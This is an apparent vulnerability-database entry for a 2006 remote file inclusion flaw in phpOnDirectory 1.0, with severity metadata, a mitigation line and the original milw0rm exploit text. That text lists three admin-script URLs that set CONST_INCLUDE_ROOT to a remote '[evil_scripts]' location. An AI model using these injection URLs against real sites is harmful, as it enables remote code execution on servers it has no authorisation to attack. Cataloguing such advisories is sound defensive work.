phpOnDirectory (CONST_INCLUDE_ROOT)

vendor:

phpOnDirectory

by:

Kacper (a.k.a Rahim)

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: phpOnDirectory

Affected Version From: v.1.0

Affected Version To: v.1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phpondirectory:phpondirectory:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpOnDirectory (CONST_INCLUDE_ROOT) <= v.1.0 Remote File Include Vulnerability

phpOnDirectory is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. Successful exploits will result in the complete compromise of the affected application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  phpOnDirectory (CONST_INCLUDE_ROOT) <= v.1.0 Remote File Include Vulnerability
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[phpOnDirectory_path]/admin/generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]

http://www.site.com/[phpOnDirectory_path]/admin/generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]

http://www.site.com/[phpOnDirectory_path]/admin/index.php?CONST_INCLUDE_ROOT=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-10]